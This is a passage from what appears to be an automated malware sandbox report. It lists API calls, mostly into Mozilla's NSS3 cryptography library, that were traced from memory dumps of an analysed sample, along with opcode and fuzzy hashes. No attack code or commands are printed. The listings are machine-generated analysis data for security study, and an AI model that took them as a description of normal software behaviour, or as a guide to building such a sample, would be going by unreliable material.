                                                                                                                                                                                                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6C376F2D
                                                                                                                                                                                                                                              • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C376F7B
                                                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C377011
                                                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6C377033
                                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C37703F
                                                                                                                                                                                                                                              • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C377060
                                                                                                                                                                                                                                              • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C377087
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C3770AF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2108637330-0
                                                                                                                                                                                                                                              • Opcode ID: dfacc55f15267aaebb3a6db73dc1e59badb7009ddec818709fac97ddef14770b
                                                                                                                                                                                                                                              • Instruction ID: 949f8b332ccc3d317a1c8fd54b499e15e397cd79653c72e242a3a324f17baa43
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfacc55f15267aaebb3a6db73dc1e59badb7009ddec818709fac97ddef14770b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40A109715142009BEB209B24DDA5BAA32B4DB8130CF244939E958DBF81E73ED859CF77
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(#?3l,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C62
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C76
                                                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(00000000,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C86
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C93
                                                                                                                                                                                                                                                • Part of subcall function 6C3BDD70: TlsGetValue.KERNEL32 ref: 6C3BDD8C
                                                                                                                                                                                                                                                • Part of subcall function 6C3BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C3BDDB4
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332CC6
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332CDA
                                                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23), ref: 6C332CEA
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?), ref: 6C332CF7
                                                                                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?), ref: 6C332D4D
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C332D61
                                                                                                                                                                                                                                              • PL_HashTableLookup.NSS3(?,?), ref: 6C332D71
                                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C332D7E
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007AD
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007CD
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C29204A), ref: 6C3007D6
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C29204A), ref: 6C3007E4
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,6C29204A), ref: 6C300864
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C300880
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsSetValue.KERNEL32(00000000,?,?,6C29204A), ref: 6C3008CB
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008D7
                                                                                                                                                                                                                                                • Part of subcall function 6C3007A0: TlsGetValue.KERNEL32(?,?,6C29204A), ref: 6C3008FB
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                              • String ID: #?3l
                                                                                                                                                                                                                                              • API String ID: 2446853827-211498274
                                                                                                                                                                                                                                              • Opcode ID: 7c876e03bd0621e29f036c279b9d98c87904b4f9729f54163d87bb2491cd2e63
                                                                                                                                                                                                                                              • Instruction ID: 2cf22c648fa116ad14653072845d4a243cfc492896d96df0b32dff47a6abc9f8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c876e03bd0621e29f036c279b9d98c87904b4f9729f54163d87bb2491cd2e63
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8751E5B6D00214ABDB01AF24DC459AA7778BF1925CB048524ED5C97B12E732ED64CFE2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                              • String ID: block
                                                                                                                                                                                                                                              • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                              • Opcode ID: 8259de89bfbde49ab53180d3e810b9deec6107944c9e036c38e8419895e02503
                                                                                                                                                                                                                                              • Instruction ID: 7825bcbe27da9618b603611e1cfecd621835b499ad6dca7fa43ef563d7fd58f0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8259de89bfbde49ab53180d3e810b9deec6107944c9e036c38e8419895e02503
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B76C0D778E985CB59
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C3EA4E6
                                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C3EA4F9
                                                                                                                                                                                                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3EA553
                                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C3EA5AC
                                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3EA5F7
                                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3EA60C
                                                                                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3EA633
                                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3EA671
                                                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C3EA69A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                              • API String ID: 2358773949-598938438
                                                                                                                                                                                                                                              • Opcode ID: 55d45bfd92b9eacdc4980b19f423e7fa6de4921cbf2f438ca4c9f30fd3b4c4dd
                                                                                                                                                                                                                                              • Instruction ID: 7fc5cbf8edd67dd121e3a04d88d5de5177feb421971966d83c235eb93ea6aede
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55d45bfd92b9eacdc4980b19f423e7fa6de4921cbf2f438ca4c9f30fd3b4c4dd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D45191B1908350ABDB01DF25D881E5A7FF1AF4931CF04886EF8898B651E736D994CF92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C38ADB1
                                                                                                                                                                                                                                                • Part of subcall function 6C36BE30: SECOID_FindOID_Util.NSS3(6C32311B,00000000,?,6C32311B,?), ref: 6C36BE44
                                                                                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C38ADF4
                                                                                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C38AE08
                                                                                                                                                                                                                                                • Part of subcall function 6C36B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4418D0,?), ref: 6C36B095
                                                                                                                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C38AE25
                                                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6C38AE63
                                                                                                                                                                                                                                              • PR_CallOnce.NSS3(6C472AA4,6C3712D0), ref: 6C38AE4D
                                                                                                                                                                                                                                                • Part of subcall function 6C294C70: TlsGetValue.KERNEL32(?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294C97
                                                                                                                                                                                                                                                • Part of subcall function 6C294C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CB0
                                                                                                                                                                                                                                                • Part of subcall function 6C294C70: PR_Unlock.NSS3(?,?,?,?,?,6C293921,6C4714E4,6C3DCC70), ref: 6C294CC9
                                                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C38AE93
                                                                                                                                                                                                                                              • PR_CallOnce.NSS3(6C472AA4,6C3712D0), ref: 6C38AECC
                                                                                                                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6C38AEDE
                                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6C38AEE6
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C38AEF5
                                                                                                                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6C38AF16
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                                              • String ID: security
                                                                                                                                                                                                                                              • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                              • Opcode ID: 7c1fcb18007498325e7382f0f8680fdfe4b54360176cac43879786ec16f8d446
                                                                                                                                                                                                                                              • Instruction ID: 913301087a6c8b65c174fc7cadb430813438a8e6b814332593a9d88283401de9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c1fcb18007498325e7382f0f8680fdfe4b54360176cac43879786ec16f8d446
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE412FB180621067EB319A159C45FAA33B89F4131CF140925E89496FC1FB3AA515CFF3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PK11_SignatureLen.NSS3(?), ref: 6C324D80
                                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6C324D95
                                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C324DF2
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C324E2C
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C324E43
                                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C324E58
                                                                                                                                                                                                                                              • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C324E85
                                                                                                                                                                                                                                              • DER_Encode_Util.NSS3(?,?,6C4705A4,00000000), ref: 6C324EA7
                                                                                                                                                                                                                                              • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C324F17
                                                                                                                                                                                                                                              • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C324F45
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C324F62
                                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C324F7A
                                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C324F89
                                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C324FC8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2843999940-0
                                                                                                                                                                                                                                              • Opcode ID: cc7a74f200e01314f9837fd7ec3d86b58d9f028e77d28f6c0ff2013cb35f8752
                                                                                                                                                                                                                                              • Instruction ID: d26c8f1aefe5f8962903d7a17b32aafae00132417d9f672a33ecb14fabc96f6f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc7a74f200e01314f9837fd7ec3d86b58d9f028e77d28f6c0ff2013cb35f8752
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A818171908301AFEB21CF25D840B5BB7E8ABC8758F14852DF998DB641E735E905CFA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C3204B7
                                                                                                                                                                                                                                                • Part of subcall function 6C370FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3187ED,00000800,6C30EF74,00000000), ref: 6C371000
                                                                                                                                                                                                                                                • Part of subcall function 6C370FF0: PR_NewLock.NSS3(?,00000800,6C30EF74,00000000), ref: 6C371016
                                                                                                                                                                                                                                                • Part of subcall function 6C370FF0: PL_InitArenaPool.NSS3(00000000,security,6C3187ED,00000008,?,00000800,6C30EF74,00000000), ref: 6C37102B
                                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C320539
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C371228
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C371238
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C37124B
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: PR_CallOnce.NSS3(6C472AA4,6C3712D0,00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C37125D
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C37126F
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C371280
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C37128E
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C37129A
                                                                                                                                                                                                                                                • Part of subcall function 6C371200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C3712A1
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C32054A
                                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C32056D
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3205CA
                                                                                                                                                                                                                                              • DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C3205EA
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C3205FD
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C320621
                                                                                                                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6C32063E
                                                                                                                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6C320668
                                                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6C320697
                                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C3206AC
                                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C3206CC
                                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3206DA
                                                                                                                                                                                                                                                • Part of subcall function 6C31E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C3204DC,?,?), ref: 6C31E6C9
                                                                                                                                                                                                                                                • Part of subcall function 6C31E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C3204DC,?,?), ref: 6C31E6D9
                                                                                                                                                                                                                                                • Part of subcall function 6C31E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C3204DC,?,?), ref: 6C31E6F4
                                                                                                                                                                                                                                                • Part of subcall function 6C31E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C3204DC,?), ref: 6C31E703
                                                                                                                                                                                                                                                • Part of subcall function 6C31E6B0: CERT_FindCertIssuer.NSS3(?,?,6C3204DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C31E71E
                                                                                                                                                                                                                                                • Part of subcall function 6C31F660: PR_EnterMonitor.NSS3(6C32050F,?,00000001,?,?,?), ref: 6C31F6A8
                                                                                                                                                                                                                                                • Part of subcall function 6C31F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C31F6C1
                                                                                                                                                                                                                                                • Part of subcall function 6C31F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C31F7C8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2470852775-0
                                                                                                                                                                                                                                              • Opcode ID: 35c0379b0898d04d5c06af1f7b0af2dea1c5b12d7d1492389c30a2bf4cb86159
                                                                                                                                                                                                                                              • Instruction ID: 3816bb1a7c93ee261fae216d154a927212e965e7dab82069dc999e8a3edae90c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35c0379b0898d04d5c06af1f7b0af2dea1c5b12d7d1492389c30a2bf4cb86159
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6361A071A083419FDF10DE28DC60F5B77A8EB84358F244528F99997A91E735E90CCFA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C35781D,00000000,6C34BE2C,?,6C356B1D,?,?,?,?,00000000,00000000,6C35781D), ref: 6C356C40
                                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C35781D,?,6C34BE2C,?), ref: 6C356C58
                                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C35781D), ref: 6C356C6F
                                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C356C84
